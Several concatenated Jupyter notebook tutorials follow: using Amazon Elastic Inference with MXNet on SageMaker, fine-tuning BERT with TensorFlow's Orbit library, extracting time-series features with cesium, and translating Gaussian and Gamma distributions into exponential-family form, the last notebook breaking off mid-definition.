# Using Amazon Elastic Inference with MXNet on an Amazon SageMaker Notebook Instance This notebook demonstrates how to enable and utilize Amazon Elastic Inference with our predefined SageMaker MXNet containers. Amazon Elastic Inference (EI) is a resource you can attach to your Amazon EC2 instances to accelerate your deep learning (DL) inference workloads. EI allows you to add inference acceleration to an Amazon SageMaker hosted endpoint or Jupyter notebook for a fraction of the cost of using a full GPU instance. For more information please visit: https://docs.aws.amazon.com/sagemaker/latest/dg/ei.html This notebook is an adaption of the [SageMaker MXNet MNIST notebook](https://github.com/awslabs/amazon-sagemaker-examples/blob/master/sagemaker-python-sdk/mxnet_mnist/mxnet_mnist.ipynb), with modifications showing the changes needed to enable and use EI with MXNet on SageMaker. 1. [Using Amazon Elastic Inference with MXNet on an Amazon SageMaker Notebook Instance](#Using-Amazon-Elastic-Inference-with-MXNet-on-an-Amazon-SageMaker-Notebook-Instance) 1. [MNIST dataset](#MNIST-dataset) 1. [Setup](#Setup) 1. [The training script](#The-training-script) 1. [SageMaker's MXNet estimator class](#SageMaker's-MXNet-estimator-class) 1. [Running the Training job](#Running-the-Training-job) 1. [Creating an inference endpoint and attaching an EI accelerator](#Creating-an-inference-endpoint-and-attaching-an-EI-accelerator) 1. [How our models are loaded](#How-our-models-are-loaded) 1. [Using EI with a SageMaker notebook instance](#Using-EI-with-a-SageMaker-notebook-instance) 1. [Making an inference request locally](#Making-an-inference-request-locally) 1. [Delete the Endpoint](#Delete-the-endpoint) If you are familiar with SageMaker and already have a trained model, skip ahead to the [Creating-an-inference-endpoint section](#Creating-an-inference-endpoint-with-EI) For this example, we will be utilizing the SageMaker Python SDK, which makes it easy to train and deploy MXNet models. 
In this example, we train a simple neural network using the Apache MXNet [Module API](https://mxnet.apache.org/api/python/module/module.html) and the MNIST dataset. ### MNIST dataset The MNIST dataset is widely used for handwritten digit classification, and consists of 70,000 labeled 28x28 pixel grayscale images of hand-written digits. The dataset is split into 60,000 training images and 10,000 test images. There are 10 classes (one for each of the 10 digits). The task at hand is to train a model using the 60,000 training images and subsequently test its classification accuracy on the 10,000 test images. ### Setup Let's start by creating a SageMaker session and specifying the IAM role arn used to give training and hosting access to your data. See the [documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/sagemaker-roles.html) for how to create these. Note, if more than one role is required for notebook instances, training, and/or hosting, please replace the `sagemaker.get_execution_role()` with a the appropriate full IAM role arn string(s). ``` import sagemaker role = sagemaker.get_execution_role() ``` This notebook shows how to use the SageMaker Python SDK to run your code in a local container before deploying to SageMaker's managed training or hosting environments. Just change your estimator's instance_type to local or local_gpu. For more information, see [local mode](https://github.com/aws/sagemaker-python-sdk#local-mode). To use Amazon Elastic Inference locally change your `accelerator_type` to `local_sagemaker_notebook` when calling `deploy()`. ***`local_sagemaker_notebook` will only work if you created your notebook instance with an EI accelerator attached to it.*** In order to use this feature you'll need to install docker-compose (and nvidia-docker if training with a GPU). Running following script will install docker-compose or nvidia-docker-compose and configure the notebook environment for you. 
Note, you can only run a single local notebook at a time. ``` !/bin/bash ./setup.sh ``` ### The training script The ``mnist_ei.py`` script provides all the code we need for training and hosting a SageMaker model. The script also checkpoints the model at the end of every epoch and saves the model graph, params and optimizer state in the folder `/opt/ml/checkpoints`. If the folder path does not exist then it will skip checkpointing. The script we will use is adaptated from Apache MXNet [MNIST tutorial](https://mxnet.incubator.apache.org/tutorials/python/mnist.html). ``` !pygmentize mnist_ei.py ``` ### SageMaker's MXNet estimator class The SageMaker ```MXNet``` estimator allows us to run single machine or distributed training in SageMaker, using CPU or GPU-based instances. When we create the estimator, we pass in the filename of our training script, the name of our IAM execution role, and the S3 locations we defined in the setup section. We also provide a few other parameters. ``instance_count`` and ``instance_type`` determine the number and type of SageMaker instances that will be used for the training job. The ``hyperparameters`` parameter is a ``dict`` of values that will be passed to your training script -- you can see how to access these values in the ``mnist_ei.py`` script above. For this example, we will train our model on the local instance this notebook is running on. This is achieved by using `local` for `instance_type`. By passing local, training will be done inside of a Docker container on this notebook instance. ``` from sagemaker.mxnet import MXNet mnist_estimator = MXNet( entry_point="mnist_ei.py", role=role, instance_count=1, instance_type="local", framework_version="1.7.0", py_version="py3", hyperparameters={"learning-rate": 0.1}, ) ``` ### Running the Training job After we've constructed our MXNet object, we can fit it using data stored in S3. Below we run SageMaker training on two input channels: **train** and **test**. 
During training, SageMaker makes this data stored in S3 available in the local filesystem where the mnist script is running. The ```mnist_ei.py``` script simply loads the train and test data from disk. ``` %%time import boto3 region = boto3.Session().region_name train_data_location = "s3://sagemaker-sample-data-{}/mxnet/mnist/train".format(region) test_data_location = "s3://sagemaker-sample-data-{}/mxnet/mnist/test".format(region) mnist_estimator.fit({"train": train_data_location, "test": test_data_location}) ``` ### Creating an inference endpoint and attaching an EI accelerator After training, we use the ``MXNet`` estimator object to build and deploy an ``MXNetPredictor``. This creates a Sagemaker endpoint -- a hosted prediction service that we can use to perform inference. The arguments to the ``deploy`` allows us to set the following: * `instance_count` - how many instances to back the endpoint. * `instance_type` - which EC2 instance type to use for the endpoint. For information on supported instance, please check [here](https://aws.amazon.com/sagemaker/pricing/instance-types/). * `accelerator_type` - determines which EI accelerator type to attach to each of our instances. The supported types of accelerators can be found here: https://aws.amazon.com/sagemaker/pricing/instance-types/ ### How our models are loaded You should provide your custom `model_fn` to use EI accelerator attached to your endpoint. An example of `model_fn` implementation is as follows: ```python def model_fn(model_dir): ctx = mx.cpu() sym, args, aux = mx.model.load_checkpoint(os.path.join(model_dir, 'model'), 0) sym = sym.optimize_for('EIA') mod = mx.mod.Module(symbol=sym, context=ctx, data_names=data_names, label_names=None) mod.bind(for_training=False, data_shapes=data_shapes) mod.set_params(args, aux, allow_missing=True) return mod ``` Check ``mnist_ei.py`` above for the specific implementation of `model_fn()` in this notebook example. 
In **EI MXNet 1.5.1 and earlier**, the predefined SageMaker MXNet containers have a default `model_fn`, which determines how your model is loaded. The default `model_fn` loads an MXNet Module object with a context based on the instance type of the endpoint. If an EI accelerator is attached to your endpoint and a custom `model_fn` isn't provided, then the default `model_fn` will load the MXNet Module object. This default `model_fn` works with the default `save` function. If a custom `save` function was defined, then you may need to write a custom `model_fn` function. For more information on `model_fn`, see [this documentation for using MXNet with SageMaker](https://sagemaker.readthedocs.io/en/stable/using_mxnet.html#load-a-model). For examples on how to load and serve a MXNet Module object explicitly, please see our [predefined default `model_fn` for MXNet](https://github.com/aws/sagemaker-mxnet-serving-container/blob/master/src/sagemaker_mxnet_serving_container/default_inference_handler.py#L36). ### Using EI with a SageMaker notebook instance Here we're going to utilize the EI accelerator attached to our local SageMaker notebook instance. This can be done by using `local_sagemaker_notebook` as the value for `accelerator_type`. This will make an inference request against the MXNet endpoint running on this Notebook Instance with an attached EI. An EI accelerator must be attached in order to make inferences using EI. As of now, an EI accelerator attached to a notebook will initialize for the first deep learning framework used to inference against EI. If you wish to use EI with another deep learning framework, please either restart or create a new notebook instance with the new EI. 
***`local_sagemaker_notebook` will only work if you created your notebook instance with an EI accelerator attached to it.*** ***Please restart or create a new notebook instance if you wish to use EI with a different framework than the first framework used on this notebook instance as specified when calling `deploy()` with `local_sagemaker_notebook`for `accelerator_type`.*** ``` %%time predictor = mnist_estimator.deploy( initial_instance_count=1, instance_type="local", accelerator_type="local_sagemaker_notebook" ) ``` The request handling behavior of the Endpoint is determined by the ``mnist_ei.py`` script. In this case, the script doesn't include any request handling functions, so the Endpoint will use the default handlers provided by SageMaker. These default handlers allow us to perform inference on input data encoded as a multi-dimensional JSON array. ### Making an inference request locally Now that our Endpoint is deployed and we have a ``predictor`` object, we can use it to classify handwritten digits. To see inference in action, draw a digit in the image box below. The pixel data from your drawing will be loaded into a ``data`` variable in this notebook. *Note: after drawing the image, you'll need to move to the next notebook cell.* ``` from IPython.display import HTML HTML(open("input.html").read()) ``` Now we can use the ``predictor`` object to classify the handwritten digit: ``` %%time response = predictor.predict(data) print("Raw prediction result:") print(response) labeled_predictions = list(zip(range(10), response[0])) print("Labeled predictions: ") print(labeled_predictions) labeled_predictions.sort(key=lambda label_and_prob: 1.0 - label_and_prob[1]) print("Most likely answer: {}".format(labeled_predictions[0])) ``` ### Delete the endpoint After you have finished with this example, remember to delete the prediction endpoint to release the instance(s) associated with it. 
``` print("Endpoint name: " + predictor.endpoint) import sagemaker predictor.delete_endpoint() ```
github_jupyter
##### Copyright 2020 The TensorFlow Authors. ``` #@title Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ``` # Fine-tuning a BERT model with Orbit <table class="tfo-notebook-buttons" align="left"> <td> <a target="_blank" href="https://www.tensorflow.org/text/tutorials/bert_orbit"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a> </td> <td> <a target="_blank" href="https://colab.research.google.com/github/tensorflow/text/blob/master/docs/tutorials/bert_orbit.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a> </td> <td> <a target="_blank" href="https://github.com/tensorflow/text/blob/master/docs/tutorials/bert_orbit.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View on GitHub</a> </td> <td> <a href="https://storage.googleapis.com/tensorflow_docs/text/docs/tutorials/bert_orbit.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a> </td> </table> This example will work through fine-tuning a BERT model using the [Orbit](https://www.tensorflow.org/api_docs/python/orbit) training library. Orbit is a flexible, lightweight library designed to make it easy to write [custom training loops](https://www.tensorflow.org/tutorials/distribute/custom_training) in TensorFlow. 
Orbit handles common model training tasks such as saving checkpoints, running model evaluations, and setting up summary writing, while giving users full control over implementing the inner training loop. It integrates with `tf.distribute` and supports running on different device types (CPU, GPU, and TPU). Most examples on [tensorflow.org](https://www.tensorflow.org/) use custom training loops or [model.fit()](https://www.tensorflow.org/api_docs/python/tf/keras/Model) from Keras. Orbit is a good alternative to `model.fit` if your model is complex and your training loop requires more flexibility, control, or customization. Also, using Orbit can simplify the code when there are many different model architectures that all use the same custom training loop. This tutorial focuses on setting up and using Orbit, rather than details about BERT, model construction, and data processing. For more in-depth tutorials on these topics, refer to the following tutorials: * [Fine tune BERT](https://www.tensorflow.org/text/tutorials/fine_tune_bert) - which goes into detail on these sub-topics. * [Fine tune BERT for GLUE on TPU](https://www.tensorflow.org/text/tutorials/bert_glue) - which generalizes the code to run any BERT configuration on any [GLUE](https://www.tensorflow.org/datasets/catalog/glue) sub-task, and runs on TPU. ## Install the TensorFlow Models package Install and import the necessary packages, then configure all the objects necessary for training a model. ``` # Uninstall opencv-python to avoid a conflict (in Colab) with the opencv-python-headless package that tf-models uses. !pip uninstall -y opencv-python !pip install -U -q "tensorflow>=2.9.0" "tf-models-official" ``` The `tf-models-official` package contains both the `orbit` and `tensorflow_models` modules. ``` import tensorflow_models as tfm import orbit ``` ## Setup for training This tutorial does not focus on configuring the environment, building the model and optimizer, and loading data. 
All these techniques are covered in more detail in the [Fine tune BERT](https://www.tensorflow.org/text/tutorials/fine_tune_bert) and [Fine tune BERT with GLUE](https://www.tensorflow.org/text/tutorials/bert_glue) tutorials. To view how the training is set up for this tutorial, expand the rest of this section. <!-- <div class="tfo-display-only-on-site"><devsite-expandable> <button type="button" class="button-red button expand-control">Expand Section</button> --> ### Import the necessary packages Import the BERT model and dataset building library from [Tensorflow Model Garden](https://github.com/tensorflow/models). ``` import glob import os import pathlib import tempfile import time import numpy as np import tensorflow as tf from official.nlp.data import sentence_prediction_dataloader from official.nlp import optimization ``` ### Configure the distribution strategy While `tf.distribute` won't help the model's runtime if you're running on a single machine or GPU, it's necessary for TPUs. Setting up a distribution strategy allows you to use the same code regardless of the configuration. ``` logical_device_names = [logical_device.name for logical_device in tf.config.list_logical_devices()] if 'GPU' in ''.join(logical_device_names): strategy = tf.distribute.MirroredStrategy() elif 'TPU' in ''.join(logical_device_names): resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu='') tf.config.experimental_connect_to_cluster(resolver) tf.tpu.experimental.initialize_tpu_system(resolver) strategy = tf.distribute.TPUStrategy(resolver) else: strategy = tf.distribute.OneDeviceStrategy(logical_device_names[0]) ``` For more information about the TPU setup, refer to the [TPU guide](https://www.tensorflow.org/guide/tpu). 
### Create a model and an optimizer ``` max_seq_length = 128 learning_rate = 3e-5 num_train_epochs = 3 train_batch_size = 32 eval_batch_size = 64 train_data_size = 3668 steps_per_epoch = int(train_data_size / train_batch_size) train_steps = steps_per_epoch * num_train_epochs warmup_steps = int(train_steps * 0.1) print("train batch size: ", train_batch_size) print("train epochs: ", num_train_epochs) print("steps_per_epoch: ", steps_per_epoch) model_dir = pathlib.Path(tempfile.mkdtemp()) print(model_dir) ``` Create a BERT Classifier model and a simple optimizer. They must be created inside `strategy.scope` so that the variables can be distributed. ``` with strategy.scope(): encoder_network = tfm.nlp.encoders.build_encoder( tfm.nlp.encoders.EncoderConfig(type="bert")) classifier_model = tfm.nlp.models.BertClassifier( network=encoder_network, num_classes=2) optimizer = optimization.create_optimizer( init_lr=3e-5, num_train_steps=steps_per_epoch * num_train_epochs, num_warmup_steps=warmup_steps, end_lr=0.0, optimizer_type='adamw') tf.keras.utils.plot_model(classifier_model) ``` ### Initialize from a Checkpoint ``` bert_dir = 'gs://cloud-tpu-checkpoints/bert/v3/uncased_L-12_H-768_A-12/' tf.io.gfile.listdir(bert_dir) bert_checkpoint = bert_dir + 'bert_model.ckpt' def init_from_ckpt_fn(): init_checkpoint = tf.train.Checkpoint(**classifier_model.checkpoint_items) with strategy.scope(): (init_checkpoint .read(bert_checkpoint) .expect_partial() .assert_existing_objects_matched()) with strategy.scope(): init_from_ckpt_fn() ``` To use Orbit, create a `tf.train.CheckpointManager` object. 
``` checkpoint = tf.train.Checkpoint(model=classifier_model, optimizer=optimizer) checkpoint_manager = tf.train.CheckpointManager( checkpoint, directory=model_dir, max_to_keep=5, step_counter=optimizer.iterations, checkpoint_interval=steps_per_epoch, init_fn=init_from_ckpt_fn) ``` ### Create distributed datasets As a shortcut for this tutorial, the [GLUE/MPRC dataset](https://www.tensorflow.org/datasets/catalog/glue#gluemrpc) has been converted to a pair of [TFRecord](https://www.tensorflow.org/tutorials/load_data/tfrecord) files containing serialized `tf.train.Example` protos. The data was converted using [this script](https://github.com/tensorflow/models/blob/r2.9.0/official/nlp/data/create_finetuning_data.py). ``` train_data_path = "gs://download.tensorflow.org/data/model_garden_colab/mrpc_train.tf_record" eval_data_path = "gs://download.tensorflow.org/data/model_garden_colab/mrpc_eval.tf_record" def _dataset_fn(input_file_pattern, global_batch_size, is_training, input_context=None): data_config = sentence_prediction_dataloader.SentencePredictionDataConfig( input_path=input_file_pattern, seq_length=max_seq_length, global_batch_size=global_batch_size, is_training=is_training) return sentence_prediction_dataloader.SentencePredictionDataLoader( data_config).load(input_context=input_context) train_dataset = orbit.utils.make_distributed_dataset( strategy, _dataset_fn, input_file_pattern=train_data_path, global_batch_size=train_batch_size, is_training=True) eval_dataset = orbit.utils.make_distributed_dataset( strategy, _dataset_fn, input_file_pattern=eval_data_path, global_batch_size=eval_batch_size, is_training=False) ``` ### Create a loss function ``` def loss_fn(labels, logits): """Classification loss.""" labels = tf.squeeze(labels) log_probs = tf.nn.log_softmax(logits, axis=-1) one_hot_labels = tf.one_hot( tf.cast(labels, dtype=tf.int32), depth=2, dtype=tf.float32) per_example_loss = -tf.reduce_sum( tf.cast(one_hot_labels, dtype=tf.float32) * log_probs, axis=-1) 
return tf.reduce_mean(per_example_loss) ``` </devsite-expandable></div> ## Controllers, Trainers and Evaluators When using Orbit, the `orbit.Controller` class drives the training. The Controller handles the details of distribution strategies, step counting, TensorBoard summaries, and checkpointing. To implement the training and evaluation, pass a `trainer` and `evaluator`, which are subclass instances of `orbit.AbstractTrainer` and `orbit.AbstractEvaluator`. Keeping with Orbit's light-weight design, these two classes have a minimal interface. The Controller drives training and evaluation by calling `trainer.train(num_steps)` and `evaluator.evaluate(num_steps)`. These `train` and `evaluate` methods return a dictionary of results for logging. Training is broken into chunks of length `num_steps`. This is set by the Controller's [`steps_per_loop`](https://tensorflow.org/api_docs/python/orbit/Controller#args) argument. With the trainer and evaluator abstract base classes, the meaning of `num_steps` is entirely determined by the implementer. Some common examples include: * Having the chunks represent dataset-epoch boundaries, like the default keras setup. * Using it to more efficiently dispatch a number of training steps to an accelerator with a single `tf.function` call (like the `steps_per_execution` argument to `Model.compile`). * Subdividing into smaller chunks as needed. ### StandardTrainer and StandardEvaluator Orbit provides two additional classes, `orbit.StandardTrainer` and `orbit.StandardEvaluator`, to give more structure around the training and evaluation loops. With StandardTrainer, you only need to set `train_loop_begin`, `train_step`, and `train_loop_end`. The base class handles the loops, dataset logic, and `tf.function` (according to the options set by their `orbit.StandardTrainerOptions`). This is simpler than `orbit.AbstractTrainer`, which requires you to handle the entire loop. 
StandardEvaluator has a similar structure and simplification to StandardTrainer. This is effectively an implementation of the `steps_per_execution` approach used by Keras. Contrast this with Keras, where training is divided both into epochs (a single pass over the dataset) and `steps_per_execution` (set within [`Model.compile`](https://www.tensorflow.org/api_docs/python/tf/keras/Model#compile)). In Keras, metric averages are typically accumulated over an epoch, and reported & reset between epochs. For efficiency, `steps_per_execution` only controls the number of training steps made per call. In this simple case, `steps_per_loop` (within `StandardTrainer`) will handle both the metric resets and the number of steps per call. The minimal setup when using these base classes is to implement the methods as follows: 1. `StandardTrainer.train_loop_begin` - Reset your training metrics. 2. `StandardTrainer.train_step` - Apply a single gradient update. 3. `StandardTrainer.train_loop_end` - Report your training metrics. and 4. `StandardEvaluator.eval_begin` - Reset your evaluation metrics. 5. `StandardEvaluator.eval_step` - Run a single evaluation step. 6. `StandardEvaluator.eval_reduce` - This is not necessary in this simple setup. 7. `StandardEvaluator.eval_end` - Report your evaluation metrics. Depending on the settings, the base class may wrap the `train_step` and `eval_step` code in `tf.function` or `tf.while_loop`, which has some limitations compared to standard python. ### Define the trainer class In this section you'll create a subclass of `orbit.StandardTrainer` for this task. Note: To better explain the `BertClassifierTrainer` class, this section defines each method as a stand-alone function and assembles them into a class at the end. The trainer needs access to the training data, model, optimizer, and distribution strategy. Pass these as arguments to the initializer. Define a single training metric, `training_loss`, using `tf.keras.metrics.Mean`. 
``` def trainer_init(self, train_dataset, model, optimizer, strategy): self.strategy = strategy with self.strategy.scope(): self.model = model self.optimizer = optimizer self.global_step = self.optimizer.iterations self.train_loss = tf.keras.metrics.Mean( 'training_loss', dtype=tf.float32) orbit.StandardTrainer.__init__(self, train_dataset) ``` Before starting a run of the training loop, the `train_loop_begin` method will reset the `train_loss` metric. ``` def train_loop_begin(self): self.train_loss.reset_states() ``` The `train_step` is a straight-forward loss-calculation and gradient update that is run by the distribution strategy. This is accomplished by defining the gradient step as a nested function (`step_fn`). The method receives `tf.distribute.DistributedIterator` to handle the [distributed input](https://www.tensorflow.org/tutorials/distribute/input). The method uses `Strategy.run` to execute `step_fn` and feeds it from the distributed iterator. ``` def train_step(self, iterator): def step_fn(inputs): labels = inputs.pop("label_ids") with tf.GradientTape() as tape: model_outputs = self.model(inputs, training=True) # Raw loss is used for reporting in metrics/logs. raw_loss = loss_fn(labels, model_outputs) # Scales down the loss for gradients to be invariant from replicas. loss = raw_loss / self.strategy.num_replicas_in_sync grads = tape.gradient(loss, self.model.trainable_variables) optimizer.apply_gradients(zip(grads, self.model.trainable_variables)) # For reporting, the metric takes the mean of losses. self.train_loss.update_state(raw_loss) self.strategy.run(step_fn, args=(next(iterator),)) ``` The `orbit.StandardTrainer` handles the `@tf.function` and loops. After running through `num_steps` of training, `StandardTrainer` calls `train_loop_end`. The function returns the metric results: ``` def train_loop_end(self): return { self.train_loss.name: self.train_loss.result(), } ``` Build a subclass of `orbit.StandardTrainer` with those methods. 
``` class BertClassifierTrainer(orbit.StandardTrainer): __init__ = trainer_init train_loop_begin = train_loop_begin train_step = train_step train_loop_end = train_loop_end ``` ### Define the evaluator class Note: Like the previous section, this section defines each method as a stand-alone function and assembles them into a `BertClassifierEvaluator` class at the end. The evaluator is even simpler for this task. It needs access to the evaluation dataset, the model, and the strategy. After saving references to those objects, the constructor just needs to create the metrics. ``` def evaluator_init(self, eval_dataset, model, strategy): self.strategy = strategy with self.strategy.scope(): self.model = model self.eval_loss = tf.keras.metrics.Mean( 'evaluation_loss', dtype=tf.float32) self.eval_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='accuracy', dtype=tf.float32) orbit.StandardEvaluator.__init__(self, eval_dataset) ``` Similar to the trainer, the `eval_begin` and `eval_end` methods just need to reset the metrics before the loop and then report the results after the loop. ``` def eval_begin(self): self.eval_accuracy.reset_states() self.eval_loss.reset_states() def eval_end(self): return { self.eval_accuracy.name: self.eval_accuracy.result(), self.eval_loss.name: self.eval_loss.result(), } ``` The `eval_step` method works like `train_step`. The inner `step_fn` defines the actual work of calculating the loss & accuracy and updating the metrics. The outer `eval_step` receives `tf.distribute.DistributedIterator` as input, and uses `Strategy.run` to launch the distributed execution to `step_fn`, feeding it from the distributed iterator. 
``` def eval_step(self, iterator): def step_fn(inputs): labels = inputs.pop("label_ids") # Evaluation must run the model in inference mode (training=False disables dropout etc.). model_outputs = self.model(inputs, training=False) loss = loss_fn(labels, model_outputs) self.eval_loss.update_state(loss) self.eval_accuracy.update_state(labels, model_outputs) self.strategy.run(step_fn, args=(next(iterator),)) ``` Build a subclass of `orbit.StandardEvaluator` with those methods. ``` class BertClassifierEvaluator(orbit.StandardEvaluator): __init__ = evaluator_init eval_begin = eval_begin eval_end = eval_end eval_step = eval_step ``` ### End-to-end training and evaluation To run the training and evaluation, simply create the trainer, evaluator, and `orbit.Controller` instances. Then call the `Controller.train_and_evaluate` method. ``` trainer = BertClassifierTrainer( train_dataset, classifier_model, optimizer, strategy) evaluator = BertClassifierEvaluator( eval_dataset, classifier_model, strategy) controller = orbit.Controller( trainer=trainer, evaluator=evaluator, global_step=trainer.global_step, steps_per_loop=20, checkpoint_manager=checkpoint_manager) result = controller.train_and_evaluate( train_steps=steps_per_epoch * num_train_epochs, eval_steps=-1, eval_interval=steps_per_epoch) ```
github_jupyter
# Cesium ``` #!pip install cesium # !pip install pandas==1.0.5 %load_ext autoreload %load_ext memory_profiler %autoreload 2 import numpy as np import pandas as pd from pathlib import Path from datetime import datetime import scipy.stats as ss ``` --- ``` # create some dummy data data_dir = Path("../data") df_acc = pd.read_parquet( data_dir.joinpath("empatica/acc.parquet"), engine="fastparquet" ).set_index("timestamp") fs = 1000 # the sample frequency duration_s = 1 * 60 * 60 # 1 hour of data size = int(duration_s * fs) df_emg = pd.DataFrame( index=pd.date_range( start=datetime.now(), periods=size, freq=pd.Timedelta(seconds=1 / fs) ), data=np.array( [ np.repeat(df_acc.values[:, idx % 3] / 64, np.ceil(size / len(df_acc)))[ :size ] for idx in range(5) ] ).astype(np.float32).transpose(), columns=["emg", "eog", "lso", "rio", "m1-a1"], ) print("memory usage: ", round(sum(df_emg.memory_usage(deep=True) / (2**20)), 2), "MB") df_emg.tail(3) from cesium import featurize, util, data_management, time_series, datasets eeg = datasets.fetch_andrzejak() # Group together classes (Z, O), (N, F), (S) as normal, interictal, ictal eeg["classes"] = eeg["classes"].astype("U16") # allocate memory for longer class names eeg["classes"][np.logical_or(eeg["classes"]=="Z", eeg["classes"]=="O")] = "Normal" eeg["classes"][np.logical_or(eeg["classes"]=="N", eeg["classes"]=="F")] = "Interictal" eeg["classes"][eeg["classes"]=="S"] = "Ictal" pd.DataFrame(eeg) ``` ## univariate seres where we mingle :clown: ``` from cesium import featurize features_to_use = [ "amplitude", "percent_beyond_1_std", "maximum", "max_slope", "median", "median_absolute_deviation", "percent_close_to_median", "minimum", "skew", "std", "weighted_average", ] # copy the eeg sample dict eeg_mingled = eeg.copy() # create a new view where each for idx in np.random.choice(len(eeg['measurements']), size=300, replace=False): times = eeg_mingled["times"][idx] measurements = eeg_mingled["measurements"][idx] new_length = 
np.random.choice(len(times), size=1)[0] eeg_mingled["times"][idx] = times[:new_length] eeg_mingled["measurements"][idx] = measurements[:new_length] for t in eeg_mingled['times'][:25]: print(t.shape) #%%memit fset_cesium = featurize.featurize_time_series( times=eeg_mingled["times"], values=eeg_mingled["measurements"], errors=None, features_to_use=features_to_use, ) # Display the computed feature set (the dangling "fset_cesium." was a syntax error). fset_cesium.head() ``` ## Custom one to many features ``` def mean_std_signal(t, m, e): return [np.mean(m), np.std(m)] def skew_signal(t, m, e): return ss.skew(m) guo_features = { "mean_std": mean_std_signal, "skew": skew_signal } fset_guo = featurize.featurize_time_series(times=eeg["times"], values=eeg["measurements"], errors=None, features_to_use=list(guo_features.keys()), # meta_features== features which are added to the output custom_functions=guo_features) ``` --- ## Multivariate series where we mingle ``` !pip install PyWavelets import pywt # create a view with 3 channels n_channels = 3 eeg["dwts"] = [pywt.wavedec(m, pywt.Wavelet("db1"), level=n_channels-1) for m in eeg["measurements"]] # copy the eeg sample dict eeg_mingled = eeg.copy() # downsize the dimensions randomly for idx in np.random.choice(len(eeg["dwts"]), size=250, replace=False): for i in range(3): new_length = np.random.choice(len(eeg_mingled["dwts"][idx][i]), size=1)[0] + 20 eeg_mingled["dwts"][idx][i] = eeg_mingled["dwts"][idx][i][:new_length] # validation -> print some of these dimensions for dwts in eeg_mingled['dwts'][:10]: print("shapes: ", ", ".join([str(len(dwt)) for dwt in dwts])) # try to calculate the features fset_dwt = featurize.featurize_time_series( times=None, values=eeg_mingled["dwts"], errors=None, features_to_use=features_to_use, ) fset_dwt.head() ```
github_jupyter
# Translator: Go from moment representation to ExpFam-representation This task is about taking a distribution represented by its moment-parameters, translating it into the exponential family representation, and comparing the two by plotting them. We will focus on Gaussians and Gamma-distributed variables here, but this exercise can be done for any exp.fam. distribution. **Imports** ``` import numpy as np import matplotlib.pyplot as plt from scipy.stats import norm, gamma from scipy.special import gammaln ``` **Helper function** Takes a representation of an exp.fam. distribution and a function to plot the moment-pdf ``` def plot_pdf(x, h, T, eta, A, moment_pdf): """ Put the pieces of an exp.fam.representation together and compare with the moment-representation. :param x: The values for which we will evaluate the two functions -- a list of x-values for which the pdf's are calculated :param h: The log-base measure. This is a *function* that can be evaluated at any x, and for each x return a scalar :param T: The sufficient statistics function. This is again a *function*. Takes a vector as input and return a matrix (the vector of sufficient statistics for each value of the x-vector) :param eta: Natural parameters. This is a vector, constant in x so not a function. :param A: The log partition function. This is defined by the parameterization, hence not a function in the implementation. :param moment_pdf: A function that generates the pdf using moment parameters (so, a "pointer" to a built-in) :return: Nothing. """ log_exp_fam = h(x) + np.matmul(eta, T(x)) - A # Put together the log-pdf of the exp.fam. distribution plt.plot(x, np.exp(log_exp_fam), "b-") # Plot it plt.plot(x, moment_pdf(x), "r--") # Plot the "gold-standard" plt.title('Moment PDF (red) and ExpFam pdf (blue). 
Hopefully identical') plt.show() ``` ## EXAMPLE: GAUSSIAN **Define the starting-point**, that is, define the moment-parameters, the range for which 98% of the probability mass resides, and the pdf-function ``` # Moment parameters sigma = 3. mu = -1. # Choose x to cover most of the are where the distribution has probability mass x = np.linspace(norm.ppf(0.01, loc=mu, scale=sigma), norm.ppf(0.99, loc=mu, scale=sigma), 25) # The comparison: Gauss pdf using the moment parameters def normal_pdf_function(x): return norm.pdf(x, loc=mu, scale=sigma) ``` ### Define the exp.fam. representation **Log base measure:** For the Gaussian, $h(x) = -.5\log(2\pi)$. It is constant in $x$ for the Gaussian distribution, but is defined as a function in the implementation anyway, because the log base measure is a function in general. ``` def log_base_measure_func(x): return -.5 * np.log(2*np.pi) ``` **Sufficient statistics:** For the gaussian, $T(x) = [x, x^2]$. Note that if `x` is a vector/list this function should return an array ``` def T_func(x): # Define storage space ans = np.zeros((2, x.shape[0])) # Fill in values ans[0, :] = x ans[1, :] = x * x return ans ``` **Natural parameters:** Defined from the moment parameters, and for the Gaussian it is $[\frac{\mu}{\sigma^2}, -\frac{1}{2\sigma^2}]$. ``` natural_parameters = np.array([mu/(sigma*sigma), -.5/(sigma*sigma)]) ``` **Log partition function:** Can be defined from moment parameters $(\mu, \sigma)$ or alternatively from natural parameters. Here we use $A=\frac{\mu^2}{2\sigma^2} + \log|\sigma|$. ``` log_partition = mu*mu/(2*sigma*sigma) + np.log(sigma) ``` ### Plot the exp-fam we generated, and compare to the moment-parameterized PDF Note how functions are passed on, e.g. `h=log_base_measure_func` will ensure that `h(x)`can be called from `plot_pdf` with the `x` that is defined in the scope fo that function. 
``` plot_pdf(x=x, h=log_base_measure_func, T=T_func, eta=natural_parameters, A=log_partition, moment_pdf=normal_pdf_function) ``` ## And now the Gamma-distribution Start by setting up. We can later play with alpha and beta ``` # Moment parameters alpha = 2. beta = 3. # Choose x as the range that covers 98% prob.mass x = np.linspace(gamma.ppf(0.01, a=alpha, scale=1/beta), gamma.ppf(0.99, a=alpha, scale=1/beta), 25) # Calculate moment-parameter pdf def gamma_pdf_func(x): return gamma.pdf(x, a=alpha, scale=1/beta) ``` ### Make the ExpFam representation Information about the Gamma can be found [here](https://en.wikipedia.org/wiki/Exponential_family#Table_of_distributions "here") or in the slides. ``` # Log base measure: $h(x) = 0$. It is constant in x, but is defined as a function anyway def log_base_measure_func(x): return 0 # Sufficient statistics: $T(x) = [\log(x), x]$. # If x is an array this function should return an array def T_func(x): # Define storage space ans = np.zeros((2, x.shape[0])) # Fill in values ans[0, :] = np.log(x) ans[1, :] = x return ans # Natural parameters: Defined from the moment parameters natural_parameters = np.array([alpha - 1, -beta]) # Log partition function. Can be defined from moment parameters alpha, 